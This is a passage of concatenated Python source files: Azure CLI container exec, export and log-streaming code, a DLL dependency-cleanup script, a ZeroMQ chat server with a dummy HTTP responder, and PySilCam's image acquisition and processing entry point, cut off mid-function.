            shutdown_grace_period=5,
stream_target=_stream_logs,
stream_args=(container_client, resource_group_name, name, container_name, container_group.restart_policy))
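# Example CLI usage (illustrative sketch; names are placeholders):
#   az container logs -g MyResourceGroup -n mycontainer --follow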
def container_export(cmd, resource_group_name, name, file):
resource_client = cf_resource(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
resource = resource_client.resources.get(resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
container_group_client.api_version,
False).__dict__
    # Remove unwanted properties
resource['properties'].pop('instanceView', None)
resource.pop('sku', None)
resource.pop('id', None)
resource.pop('plan', None)
resource.pop('kind', None)
resource.pop('managed_by', None)
resource['properties'].pop('provisioningState', None)
# Correctly export the identity
try:
identity = resource['identity'].type
if identity != ResourceIdentityType.none:
resource['identity'] = resource['identity'].__dict__
identity_entry = {'type': resource['identity']['type'].value}
if resource['identity']['user_assigned_identities']:
identity_entry['user_assigned_identities'] = {k: {} for k in resource['identity']['user_assigned_identities']}
resource['identity'] = identity_entry
except (KeyError, AttributeError):
        resource.pop('identity', None)
# Remove container instance views
for i in range(len(resource['properties']['containers'])):
resource['properties']['containers'][i]['properties'].pop('instanceView', None)
# Add the api version
resource['apiVersion'] = container_group_client.api_version
with open(file, 'w+') as f:
yaml.safe_dump(resource, f, default_flow_style=False)
def container_exec(cmd, resource_group_name, name, exec_command, container_name=None, terminal_row_size=20, terminal_col_size=80):
"""Start exec for a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
    if container_name or (container_name is None and len(container_group.containers) == 1):
# If only one container in container group, use that container.
if container_name is None:
container_name = container_group.containers[0].name
terminal_size = ContainerExecRequestTerminalSize(rows=terminal_row_size, cols=terminal_col_size)
execContainerResponse = container_client.execute_command(resource_group_name, name, container_name, exec_command, terminal_size)
        if platform.system() == WINDOWS_NAME:
_start_exec_pipe_win(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
_start_exec_pipe(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
raise CLIError('--container-name required when container group has more than one container.')
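# Example CLI usage (illustrative sketch; names are placeholders):
#   az container exec -g MyResourceGroup -n mycontainer --exec-command "/bin/sh"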
def _start_exec_pipe_win(web_socket_uri, password):
def _on_ws_open(ws):
ws.send(password)
t = threading.Thread(target=_capture_stdin, args=[ws])
t.daemon = True
t.start()
ws = websocket.WebSocketApp(web_socket_uri, on_open=_on_ws_open, on_message=_on_ws_msg)
ws.run_forever()
def _on_ws_msg(ws, msg):
sys.stdout.write(msg)
sys.stdout.flush()
def _capture_stdin(ws):
while True:
        if msvcrt.kbhit():
x = msvcrt.getch()
ws.send(x)
def _start_exec_pipe(web_socket_uri, password):
ws = websocket.create_connection(web_socket_uri)
oldtty = termios.tcgetattr(sys.stdin)
old_handler = signal.getsignal(signal.SIGWINCH)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
ws.send(password)
while True:
try:
if not _cycle_exec_pipe(ws):
break
except (select.error, IOError) as e:
if e.args and e.args[0] == errno.EINTR:
pass
else:
raise
except websocket.WebSocketException:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
signal.signal(signal.SIGWINCH, old_handler)
def _cycle_exec_pipe(ws):
r, _, _ = select.select([ws.sock, sys.stdin], [], [])
if ws.sock in r:
data = ws.recv()
if not data:
return False
sys.stdout.write(data)
sys.stdout.flush()
if sys.stdin in r:
x = sys.stdin.read(1)
if not x:
return True
ws.send(x)
return True
def attach_to_container(cmd, resource_group_name, name, container_name=None):
"""Attach to a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
        shutdown_grace_period=5,
stream_target=_stream_container_events_and_logs,
stream_args=(container_group_client, container_client, resource_group_name, name, container_name))
def _start_streaming(terminate_condition, terminate_condition_args, shutdown_grace_period, stream_target, stream_args):
"""Start streaming for the stream target. """
import colorama
colorama.init()
try:
t = threading.Thread(target=stream_target, args=stream_args)
t.daemon = True
t.start()
while not terminate_condition(*terminate_condition_args) and t.is_alive():
time.sleep(10)
        time.sleep(shutdown_grace_period)
finally:
colorama.deinit()
def _stream_logs(client, resource_group_name, name, container_name, restart_policy):
"""Stream logs for a container. """
lastOutputLines = 0
while True:
log = client.list_logs(resource_group_name, name, container_name)
lines = log.content.split('\n')
currentOutputLines = len(lines)
# Should only happen when the container restarts.
if currentOutputLines < lastOutputLines and restart_policy != 'Never':
print("Warning: you're having '--restart-policy={}'; the container '{}' was just restarted; the tail of the current log might be missing. Exiting...".format(restart_policy, container_name))
break
_move_console_cursor_up(lastOutputLines)
print(log.content)
lastOutputLines = currentOutputLines
time.sleep(2)
def _stream_container_events_and_logs(container_group_client, container_client, resource_group_name, name, container_name):
"""Stream container events and logs. """
lastOutputLines = 0
lastContainerState = None
while True:
container_group, container = _find_container(container_group_client, resource_group_name, name, container_name)
container_state = 'Unknown'
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state:
container_state = container.instance_view.current_state.state
_move_console_cursor_up(lastOutputLines)
if container_state != lastContainerState:
print("Container '{}' is in state '{}'...".format(container_name, container_state))
currentOutputLines = 0
if container.instance_view and container.instance_view.events:
for event in sorted(container.instance_view.events, key=lambda e: e.last_timestamp):
print('(count: {}) (last timestamp: {}) {}'.format(event.count, event.last_timestamp, event.message))
currentOutputLines += 1
lastOutputLines = currentOutputLines
lastContainerState = container_state
if container_state == 'Running':
print('\nStart streaming logs:')
break
time.sleep(2)
_stream_logs(container_client, resource_group_name, name, container_name, container_group.restart_policy)
def _is_container_terminated(client, resource_group_name, name, container_name):
"""Check if a container should be considered terminated. """
container_group, container = _find_container(client, resource_group_name, name, container_name)
# If a container group is terminated, assume the container is also terminated.
if container_group.instance_view and container_group.instance_view.state:
if container_group.instance_view.state == 'Succeeded' or container_group.instance_view.state == 'Failed':
return True
# If the restart policy is Always, assume the container will be restarted.
if container_group.restart_policy:
if container_group.restart_policy == 'Always':
return False
# Only assume the container is terminated if its state is Terminated.
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state == 'Terminated':
return True
return False
def _find_container(client, resource_group_name, name, container_name):
"""Find a container in a container group. """
container_group = client.get(resource_group_name, name)
containers = [c for c in container_group.containers if c.name == container_name]
if len(containers) != 1:
raise CLIError("Found 0 or more than 1 container with name '{}'".format(container_name))
return container_group, containers[0]
def _move_console_cursor_up(lines):
"""Move console cursor up. """
if lines > 0:
# Use stdout.write to support Python 2
sys.stdout.write('\033[{}A\033[K\033[J'.format(lines))
def _gen_guid():
import uuid
return uuid.uuid4()
|
depcheck.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2016,2017 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""
Deletes unneeded DLLs and checks DLL dependencies.
Execute with the build python, will figure out the rest.
"""
import subprocess
import os
import sys
from multiprocessing import Process, Queue
import gi
gi.require_version("GIRepository", "2.0")
from gi.repository import GIRepository
def _get_shared_libraries(q, namespace, version):
repo = GIRepository.Repository()
repo.require(namespace, version, 0)
lib = repo.get_shared_library(namespace)
q.put(lib)
def get_shared_libraries(namespace, version):
# we have to start a new process because multiple versions can't be loaded
# in the same process
q = Queue()
p = Process(target=_get_shared_libraries, args=(q, namespace, version))
p.start()
result = q.get()
p.join()
return result
def get_required_by_typelibs():
deps = set()
repo = GIRepository.Repository()
for tl in os.listdir(repo.get_search_path()[0]):
namespace, version = os.path.splitext(tl)[0].split("-", 1)
lib = get_shared_libraries(namespace, version)
if lib:
libs = lib.lower().split(",")
else:
libs = []
for lib in libs:
deps.add((namespace, version, lib))
return deps
def get_dependencies(filename):
deps = []
try:
data = subprocess.check_output(["objdump", "-p", filename],
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError:
# can happen with wrong arch binaries
return []
data = data.decode("utf-8")
for line in data.splitlines():
line = line.strip()
if line.startswith("DLL Name:"):
deps.append(line.split(":", 1)[-1].strip().lower())
return deps
def find_lib(root, name):
system_search_path = os.path.join("C:", os.sep, "Windows", "System32")
if get_lib_path(root, name):
return True
elif os.path.exists(os.path.join(system_search_path, name)):
return True
elif name in ["gdiplus.dll"]:
return True
elif name.startswith("msvcr"):
return True
return False
def get_lib_path(root, name):
search_path = os.path.join(root, "bin")
if os.path.exists(os.path.join(search_path, name)):
return os.path.join(search_path, name)
def get_things_to_delete(root):
extensions = [".exe", ".pyd", ".dll"]
all_libs = set()
needed = set()
for base, dirs, files in os.walk(root):
for f in files:
lib = f.lower()
path = os.path.join(base, f)
ext_lower = os.path.splitext(f)[-1].lower()
if ext_lower in extensions:
if ext_lower == ".exe":
# we use .exe as dependency root
needed.add(lib)
all_libs.add(f.lower())
for lib in get_dependencies(path):
all_libs.add(lib)
needed.add(lib)
if not find_lib(root, lib):
print("MISSING:", path, lib)
for namespace, version, lib in get_required_by_typelibs():
all_libs.add(lib)
needed.add(lib)
if not find_lib(root, lib):
print("MISSING:", namespace, version, lib)
to_delete = []
for not_depended_on in (all_libs - needed):
path = get_lib_path(root, not_depended_on)
if path:
to_delete.append(path)
return to_delete
def main(argv):
libs = get_things_to_delete(sys.prefix)
if "--delete" in argv[1:]:
while libs:
for l in libs:
print("DELETE:", l)
os.unlink(l)
libs = get_things_to_delete(sys.prefix)
if __name__ == "__main__":
main(sys.argv)
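# Example invocation (sketch; run with the build environment's python so that
# sys.prefix points at the bundle being checked):
#   python depcheck.py            # report missing DLL dependencies
#   python depcheck.py --delete   # additionally delete DLLs nothing depends on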
|
server.py
|
#!/usr/bin/env python3
import argparse
import http.server
import time
import threading
import zmq
# constants
HTTP_PORT=8090
RADIO_PORT=12345
PUB_PORT=5555
REP_PORT=5556
#######################################################################################################################
# TODO create server class that contains users, sessions, ...
# TODO capture exit signals
#######################################################################################################################
req_help_str = \
"""
[? | help] --> <this help string>
ctrl/info --> ctrl/users=<users>,...
ctrl/ping --> ctrl/ping
chat/login/<user>:<passwd> --> chat/[ok|nok]
chat/logout/<user> --> chat/[ok|nok]
chat/post/<topic>:<msg> --> chat/[ok|nok]
chat/send/<user>:<msg> --> chat/[ok|nok]"""
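# Minimal request/reply client sketch (not part of this script; assumes the server
# runs locally with the default REP_PORT above):
#   import zmq
#   ctx = zmq.Context()
#   sock = ctx.socket(zmq.REQ)
#   sock.connect('tcp://127.0.0.1:5556')
#   sock.send('ctrl/ping'.encode('utf-8'))
#   print(sock.recv().decode('utf-8'))   # expect 'ctrl/pong'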
class replier:
def __init__(self, zctx, port):
self.zctx = zctx
self.port = port
self.open_socket()
def open_socket(self):
self.socket = self.zctx.socket(zmq.REP)
self.socket.bind('tcp://0.0.0.0:{}'.format(self.port))
def send_reply(self, rep_str):
raw = rep_str.encode('utf-8')
self.socket.send(raw)
def wait_for_request(self):
raw = self.socket.recv()
return raw.decode('utf-8')
def mode_chat_parse(self, req_list):
req = req_list[1]
if len(req) <= 1:
rep = 'chat/nok'
print('error: REQ [mode = chat, req = {}]'.format(req))
return rep
print('mode = chat, req = {}'.format(req))
if req == 'login':
rep = 'chat/ok'
else:
rep = 'chat/nok'
return rep
def mode_ctrl_parse(self, req_list):
req = req_list[1]
if len(req) <= 1:
rep = 'ctrl/nok'
print('error: REQ format [mode = ctrl, req = {}]'.format(req))
return rep
print('mode = ctrl, req = {}'.format(req))
if req == 'info':
rep = 'ctrl/ok'
elif req == 'ping':
rep = 'ctrl/pong'
else:
rep = 'ctrl/nok'
return rep
def parse_request(self, req_str):
print('recv: {}'.format(req_str))
if req_str in ('?', 'help'):
rep_str = req_help_str
return rep_str
req_list = req_str.split(sep='/')
if len(req_list) < 2:
print('error: REQ format [{}]'.format(req_str))
return 'nok'
mode = req_list[0]
if len(mode) <= 1:
print('error: REQ format [{}]'.format(req_str))
return 'nok'
print('mode = {}'.format(mode))
        if mode == 'ctrl':
            rep_str = self.mode_ctrl_parse(req_list)
            return rep_str
        if mode == 'chat':
            # route chat requests to the existing chat handler
            rep_str = self.mode_chat_parse(req_list)
            return rep_str
        return 'nok'
def thread_req(self):
while True:
req_str = self.wait_for_request()
rep_str = self.parse_request(req_str)
self.send_reply(rep_str)
def start(self):
self.tid = threading.Thread(target=self.thread_req, daemon=True)
self.tid.start()
#######################################################################################################################
class publisher:
def __init__(self, zctx, port):
self.zctx = zctx
self.port = port
self.open_socket()
def open_socket(self):
self.socket = self.zctx.socket(zmq.PUB)
self.socket.bind('tcp://0.0.0.0:{}'.format(self.port))
def send(self, topic, msg):
data = "chat/{}/{}".format(topic, msg)
self.socket.send(data.encode('utf-8'))
#######################################################################################################################
http_content = \
"""<html>
<head><title>501 Not Implemented</title></head>
<body bgcolor="white">
<center><h1>501 Not Implemented</h1></center>
<hr><center>nginx</center>
</body>
</html>
"""
class SimpleReply(http.server.BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(501)
self.send_header("Content-type", "text/html")
self.end_headers()
def _html(self):
return http_content.encode("utf8")
def do_GET(self):
self._set_headers()
self.wfile.write(self._html())
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
self._set_headers()
        self.wfile.write(self._html())
def log_message(self, format, *args):
return
class dummy_http:
def __init__(self, port):
self.port = port
def thread_http(self):
server_address = ("0.0.0.0", self.port)
print('starting httpd server on {}'.format(server_address))
httpd = http.server.HTTPServer(server_address, SimpleReply)
httpd.serve_forever()
def start(self):
self.tid = threading.Thread(target=self.thread_http, daemon=True)
self.tid.start()
#######################################################################################################################
#https://medium.com/greedygame-engineering/an-elegant-way-to-run-periodic-tasks-in-python-61b7c477b679
class timed_job:
def __init__(self, timeout, pub):
self.timeout = timeout
self.pub = pub
self.start()
def timer_callback(self):
self.pub.send('foo', 'bar')
def thread_wait(self):
while not self.event.wait(self.timeout):
self.timer_callback()
def start(self):
self.event = threading.Event()
self.tid = threading.Thread(target=self.thread_wait, daemon=True)
self.tid.start()
#######################################################################################################################
def parse_args():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-h', '--http', dest='http_port', type=int, nargs='?', const=HTTP_PORT,
help='enable http socket on port (default: {})'.format(HTTP_PORT))
parser.add_argument('-p', '--pub', dest='pub_port', type=int, nargs='?', const=PUB_PORT, default=PUB_PORT,
help='enable publish socket on port (default: {})'.format(PUB_PORT))
parser.add_argument('-r', '--rep', dest='rep_port', type=int, nargs='?', const=REP_PORT, default=REP_PORT,
                        help='enable reply socket on port (default: {})'.format(REP_PORT))
parser.add_argument("-v", "--verbose", dest='verbose', action='store_true', help="verbose mode")
parser.add_argument('--help', action='help', help='show this help message and exit')
args = parser.parse_args()
return args
def main():
args = parse_args()
print('args: {}'.format(args))
if args.http_port != None:
web_dummy = dummy_http(args.http_port)
web_dummy.start()
zctx = zmq.Context()
if args.pub_port != None:
pub = publisher(zctx, args.pub_port)
test = timed_job(5, pub)
if args.rep_port != None:
rep = replier(zctx, args.rep_port)
rep.start()
time.sleep(99999)
if __name__ == "__main__":
main()
|
__main__.py
|
# -*- coding: utf-8 -*-
import sys
import time
import datetime
import logging
from docopt import docopt
import numpy as np
from pysilcam import __version__
from pysilcam.acquisition import Acquire
from pysilcam.background import backgrounder
from pysilcam.process import statextract
import pysilcam.oilgas as scog
from pysilcam.config import PySilcamSettings
import os
import pysilcam.silcam_classify as sccl
import multiprocessing
from multiprocessing.managers import BaseManager
from queue import LifoQueue
import psutil
from shutil import copyfile
import warnings
if not sys.warnoptions:
warnings.simplefilter("ignore")
title = '''
____ ____ _ _ ____
| _ \ _ _/ ___|(_) |/ ___|__ _ _ __ ___
| |_) | | | \___ \| | | | / _` | '_ ` _ \
| __/| |_| |___) | | | |__| (_| | | | | | |
|_| \__, |____/|_|_|\____\__,_|_| |_| |_|
|___/
'''
def silcam():
    '''Acquire/process images from the SilCam
Usage:
silcam acquire <configfile> <datapath>
silcam process <configfile> <datapath> [--nbimages=<number of images>] [--nomultiproc]
silcam realtime <configfile> <datapath> [--discwrite] [--nomultiproc]
silcam -h | --help
silcam --version
Arguments:
acquire Acquire images
process Process images
realtime Acquire images from the camera and process them in real time
Options:
--nbimages=<number of images> Number of images to process.
--discwrite Write images to disc.
--nomultiproc Deactivate multiprocessing.
-h --help Show this screen.
--version Show version.
'''
print(title)
print('')
args = docopt(silcam.__doc__, version='PySilCam {0}'.format(__version__))
if args['<datapath>']:
        # The following solves problems with transferring arguments from the shell on Windows
# Remove ' characters
datapath = os.path.normpath(args['<datapath>'].replace("'",""))
# Remove " characters at the end (occurs when user give \" at the end)
while datapath[-1] == '"':
datapath = datapath[:-1]
# this is the standard processing method under development now
if args['process']:
multiProcess = True
if args['--nomultiproc']:
multiProcess = False
nbImages = args['--nbimages']
if (nbImages != None):
try:
nbImages = int(nbImages)
except ValueError:
print('Expected type int for --nbimages.')
sys.exit(0)
silcam_process(args['<configfile>'] ,datapath, multiProcess=multiProcess, realtime=False, nbImages=nbImages)
elif args['acquire']: # this is the standard acquisition method under development now
silcam_acquire(datapath, args['<configfile>'], writeToDisk=True)
elif args['realtime']:
discWrite = False
if args['--discwrite']:
discWrite = True
multiProcess = True
if args['--nomultiproc']:
multiProcess = False
silcam_process(args['<configfile>'], datapath, multiProcess=multiProcess, realtime=True, discWrite=discWrite)
def silcam_acquire(datapath, config_filename, writeToDisk=True, gui=None):
    '''Acquire images from the SilCam
Args:
datapath (str) : Path to the image storage
config_filename=None (str) : Camera config file
writeToDisk=True (Bool) : True will enable writing of raw data to disc
False will disable writing of raw data to disc
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
'''
#Load the configuration, create settings object
settings = PySilcamSettings(config_filename)
#Print configuration to screen
print('---- CONFIGURATION ----\n')
settings.config.write(sys.stdout)
print('-----------------------\n')
if (writeToDisk):
# Copy config file
configFile2Copy = datetime.datetime.now().strftime('D%Y%m%dT%H%M%S.%f') + os.path.basename(config_filename)
copyfile(config_filename, os.path.join(datapath, configFile2Copy))
configure_logger(settings.General)
logger = logging.getLogger(__name__ + '.silcam_acquire')
# update path_length
updatePathLength(settings, logger)
acq = Acquire(USE_PYMBA=True) # ini class
t1 = time.time()
aqgen = acq.get_generator(datapath, camera_config_file=config_filename, writeToDisk=writeToDisk)
for i, (timestamp, imraw) in enumerate(aqgen):
t2 = time.time()
aq_freq = np.round(1.0/(t2 - t1), 1)
requested_freq = 16.0
rest_time = (1 / requested_freq) - (1 / aq_freq)
rest_time = np.max([rest_time, 0.])
time.sleep(rest_time)
actual_aq_freq = 1/(1/aq_freq + rest_time)
print('Image {0} acquired at frequency {1:.1f} Hz'.format(i, actual_aq_freq))
t1 = time.time()
if not gui==None:
while (gui.qsize() > 0):
try:
gui.get_nowait()
time.sleep(0.001)
except:
continue
#try:
rtdict = dict()
rtdict = {'dias': 0,
'vd_oil': 0,
'vd_gas': 0,
'oil_d50': 0,
'gas_d50': 0,
'saturation': 0}
gui.put_nowait((timestamp, imraw, imraw, rtdict))
# the standard processing method under active development
def silcam_process(config_filename, datapath, multiProcess=True, realtime=False, discWrite=False, nbImages=None, gui=None,
overwriteSTATS = True):
'''Run processing of SilCam images
Args:
config_filename (str) : The filename (including path) of the config.ini file
datapath (str) : Path to the data directory
multiProcess=True (bool) : If True, multiprocessing is used
        realtime=False (bool)  : If True, a faster but less accurate method is used for segmentation and real-time stats become active
discWrite=False (bool) : True will enable writing of raw data to disc
False will disable writing of raw data to disc
        nbImages=None (int)    : Number of images to process
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
'''
print(config_filename)
print('')
#---- SETUP ----
#Load the configuration, create settings object
settings = PySilcamSettings(config_filename)
#Print configuration to screen
print('---- CONFIGURATION ----\n')
settings.config.write(sys.stdout)
print('-----------------------\n')
#Configure logging
configure_logger(settings.General)
logger = logging.getLogger(__name__ + '.silcam_process')
logger.info('Processing path: ' + datapath)
if realtime:
if discWrite:
# copy config file into data path
configFile2Copy = datetime.datetime.now().strftime('D%Y%m%dT%H%M%S.%f') + os.path.basename(config_filename)
copyfile(config_filename, os.path.join(datapath, configFile2Copy))
# update path_length
updatePathLength(settings, logger)
#Initialize the image acquisition generator
aq = Acquire(USE_PYMBA=realtime)
aqgen = aq.get_generator(datapath, writeToDisk=discWrite,
camera_config_file=config_filename)
#Get number of images to use for background correction from config
print('* Initializing background image handler')
bggen = backgrounder(settings.Background.num_images, aqgen,
bad_lighting_limit = settings.Process.bad_lighting_limit,
real_time_stats=settings.Process.real_time_stats)
# make datafilename autogenerated for easier batch processing
if (not os.path.isdir(settings.General.datafile)):
logger.info('Folder ' + settings.General.datafile + ' was not found and is created')
os.mkdir(settings.General.datafile)
procfoldername = os.path.split(datapath)[-1]
datafilename = os.path.join(settings.General.datafile,procfoldername)
logger.info('output stats to: ' + datafilename)
if os.path.isfile(datafilename + '-STATS.csv') and overwriteSTATS:
logger.info('removing: ' + datafilename + '-STATS.csv')
print('Overwriting ' + datafilename + '-STATS.csv')
os.remove(datafilename + '-STATS.csv')
# Create export directory if needed
if settings.ExportParticles.export_images:
if (not os.path.isdir(settings.ExportParticles.outputpath)):
logger.info('Export folder ' + settings.ExportParticles.outputpath + ' was not found and is created')
os.mkdir(settings.ExportParticles.outputpath)
#---- END SETUP ----
#---- RUN PROCESSING ----
# If only one core is available, no multiprocessing will be done
multiProcess = multiProcess and (multiprocessing.cpu_count() > 1)
print('* Commencing image acquisition and processing')
# initialise realtime stats class regardless of whether it is used later
rts = scog.rt_stats(settings)
if (multiProcess):
proc_list = []
mem = psutil.virtual_memory()
memAvailableMb = mem.available >> 20
distributor_q_size = np.min([int(memAvailableMb / 2 * 1/15), np.copy(multiprocessing.cpu_count() * 4)])
logger.debug('setting up processing queues')
inputQueue, outputQueue = defineQueues(realtime, distributor_q_size)
logger.debug('setting up processing distributor')
distributor(inputQueue, outputQueue, config_filename, proc_list, gui)
# iterate on the bggen generator to obtain images
logger.debug('Starting acquisition loop')
t2 = time.time()
for i, (timestamp, imc, imraw) in enumerate(bggen):
t1 = np.copy(t2)
t2 = time.time()
print(t2-t1, 'Acquisition loop time')
logger.debug('Corrected image ' + str(timestamp) +
' acquired from backgrounder')
# handle errors if the loop function fails for any reason
if (nbImages != None):
if (nbImages <= i):
break
logger.debug('Adding image to processing queue: ' + str(timestamp))
addToQueue(realtime, inputQueue, i, timestamp, imc) # the tuple (i, timestamp, imc) is added to the inputQueue
logger.debug('Processing queue updated')
# write the images that are available for the moment into the csv file
logger.debug('Running collector')
collector(inputQueue, outputQueue, datafilename, proc_list, False,
settings, rts=rts)
logger.debug('Data collected')
if not gui==None:
logger.debug('Putting data on GUI Queue')
while (gui.qsize() > 0):
try:
gui.get_nowait()
time.sleep(0.001)
except:
continue
#try:
rtdict = dict()
rtdict = {'dias': rts.dias,
'vd_oil': rts.vd_oil,
'vd_gas': rts.vd_gas,
'oil_d50': rts.oil_d50,
'gas_d50': rts.gas_d50,
'saturation': rts.saturation}
gui.put_nowait((timestamp, imc, imraw, rtdict))
logger.debug('GUI queue updated')
logger.debug('Acquisition loop completed')
if (not realtime):
logger.debug('Halting processes')
for p in proc_list:
inputQueue.put(None)
# some images might still be waiting to be written to the csv file
logger.debug('Running collector on left over data')
collector(inputQueue, outputQueue, datafilename, proc_list, True,
settings, rts=rts)
logger.debug('All data collected')
for p in proc_list:
p.join()
logger.info('%s.exitcode = %s' % (p.name, p.exitcode) )
else:
# load the model for particle classification and keep it for later
nnmodel = []
nnmodel, class_labels = sccl.load_model(model_path=settings.NNClassify.model_path)
# iterate on the bggen generator to obtain images
for i, (timestamp, imc, imraw) in enumerate(bggen):
# handle errors if the loop function fails for any reason
if (nbImages != None):
if (nbImages <= i):
break
image = (i, timestamp, imc)
# one single image is processed at a time
stats_all = processImage(nnmodel, class_labels, image, settings, logger, gui)
if (not stats_all is None): # if frame processed
# write the image into the csv file
writeCSV( datafilename, stats_all)
print('PROCESSING COMPLETE.')
#---- END ----
def addToQueue(realtime, inputQueue, i, timestamp, imc):
'''
Put a new image into the Queue.
Args:
        realtime (bool)     : boolean indicating whether the processing is done in realtime
inputQueue () : queue where the images are added for processing
                              initialised using defineQueues()
i (int) : index of the image acquired
timestamp (timestamp): timestamp of the acquired image
imc (uint8) : corrected image
'''
if (realtime):
try:
inputQueue.put_nowait((i, timestamp, imc))
except:
pass
else:
while True:
try:
inputQueue.put((i, timestamp, imc), True, 0.5)
break
except:
pass
def defineQueues(realtime, size):
'''
    Define the input and output queues depending on whether we are in realtime mode
Args:
realtime: boolean indicating whether the processing is done in realtime
size: max size of the queue
Returns:
inputQueue
outputQueue
'''
createQueues = createLIFOQueues if realtime else createFIFOQueues
return createQueues(size)
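# Usage sketch (illustrative): realtime mode gives manager-backed LIFO queues,
# batch mode gives plain multiprocessing FIFO queues:
#   inputQueue, outputQueue = defineQueues(realtime=False, size=8)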
def createLIFOQueues(size):
'''
Create a LIFOQueue (Last In First Out)
Args:
size: max size of the queue
Returns:
inputQueue
outputQueue
'''
manager = MyManager()
manager.start()
inputQueue = manager.LifoQueue(size)
outputQueue = manager.LifoQueue(size)
return inputQueue, outputQueue
def createFIFOQueues(size):
'''
Create a FIFOQueue (First In First Out)
Args:
size: max size of the queue
Returns:
inputQueue
outputQueue
'''
inputQueue = multiprocessing.Queue(size)
outputQueue = multiprocessing.Queue(size)
return inputQueue, outputQueue
class MyManager(BaseManager):
'''
Customized manager class used to register LifoQueues
'''
pass
MyManager.register('LifoQueue', LifoQueue)
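# A short usage sketch of the queue helpers above: in realtime mode the
# manager-backed LIFO queues favour the newest frames, while offline
# processing uses plain FIFO multiprocessing queues so no frame is skipped.
# The queue size of 3 below is an arbitrary illustrative value.
def _example_define_queues(realtime=True):
    inputQueue, outputQueue = defineQueues(realtime, 3)
    # producers call addToQueue(realtime, inputQueue, i, timestamp, imc);
    # in realtime mode a full queue silently drops the frame, otherwise the
    # put blocks (retrying every 0.5 s) until a worker frees a slot.
    return inputQueue, outputQueue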
def processImage(nnmodel, class_labels, image, settings, logger, gui):
'''
Processes an image
Args:
nnmodel (tensorflow model object) : loaded using sccl.load_model()
class_labels (str) : loaded using sccl.load_model()
image (tuple) : tuple containing (i, timestamp, imc)
where i is an int referring to the image number
timestamp is the image timestamp obtained from passing the filename
imc is the background-corrected image obtained using the backgrounder generator
settings (PySilcamSettings) : Settings read from a .ini file
logger (logger object) : logger object created using
configure_logger()
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
Returns:
stats_all (DataFrame) : stats dataframe containing particle statistics
'''
try:
i = image[0]
timestamp = image[1]
imc = image[2]
#time the full acquisition and processing loop
start_time = time.time()
logger.info('Processing time stamp {0}'.format(timestamp))
#Calculate particle statistics
stats_all, imbw, saturation = statextract(imc, settings, timestamp,
nnmodel, class_labels)
# if no particles are identified, assume zero concentration.
# This means that the data should indicate that a 'good' image was
# obtained, without any particles. Therefore fill all values with nans
# and add the image timestamp
if len(stats_all) == 0:
print('ZERO particles identified')
z = np.zeros(len(stats_all.columns)) * np.nan
stats_all.loc[0] = z
# 'export name' should not be nan because then this column of the
# DataFrame will contain multiple types, so label with string instead
if settings.ExportParticles.export_images:
stats_all['export name'] = 'not_exported'
# add timestamp to each row of particle statistics
stats_all['timestamp'] = timestamp
# add saturation to each row of particle statistics
stats_all['saturation'] = saturation
#Time the particle statistics processing step
proc_time = time.time() - start_time
#Print timing information for this iteration
infostr = ' Image {0} processed in {1:.2f} sec ({2:.1f} Hz). '
infostr = infostr.format(i, proc_time, 1.0/proc_time)
print(infostr)
#---- END MAIN PROCESSING LOOP ----
#---- DO SOME ADMIN ----
except:
infostr = 'Failed to process frame {0}, skipping.'.format(i)
logger.warning(infostr, exc_info=True)
print(infostr)
return None
return stats_all
def loop(config_filename, inputQueue, outputQueue, gui=None):
'''
Main processing loop, run for each image
Args:
config_filename (str) : path of the config ini file
inputQueue () : queue where the images are added for processing
initialised using defineQueues()
outputQueue () : queue where information is retrieved from processing
initialised using defineQueues()
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
'''
settings = PySilcamSettings(config_filename)
configure_logger(settings.General)
logger = logging.getLogger(__name__ + '.silcam_process')
# load the model for particle classification and keep it for later
nnmodel = []
nnmodel, class_labels = sccl.load_model(model_path=settings.NNClassify.model_path)
while True:
task = inputQueue.get()
if task is None:
outputQueue.put(None)
break
stats_all = processImage(nnmodel, class_labels, task, settings, logger, gui)
if stats_all is not None:
outputQueue.put(stats_all)
else:
logger.debug('No stats found. skipping image.')
def distributor(inputQueue, outputQueue, config_filename, proc_list, gui=None):
'''
distributes the images in the input queue to the different loop processes
Args:
inputQueue () : queue where the images are added for processing
initialised using defineQueues()
outputQueue () : queue where information is retrieved from processing
initialised using defineQueues()
proc_list (list) : list of multiprocessing objects
gui=None (Class object) : Queue used to pass information between process thread and GUI
initialised in ProcThread within guicals.py
'''
numCores = max(1, multiprocessing.cpu_count() - 2)
for nbCore in range(numCores):
proc = multiprocessing.Process(target=loop, args=(config_filename, inputQueue, outputQueue, gui))
proc_list.append(proc)
proc.start()
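# How the pieces above fit together (a hedged sketch, not part of the module):
# the distributor spawns one `loop` process per spare core, each pulling
# images from inputQueue and pushing stats DataFrames to outputQueue, while
# the collector drains outputQueue into the -STATS.csv file. The config path
# and filename below are placeholders.
def _example_pipeline(config_filename='config.ini', datafilename='out/data'):
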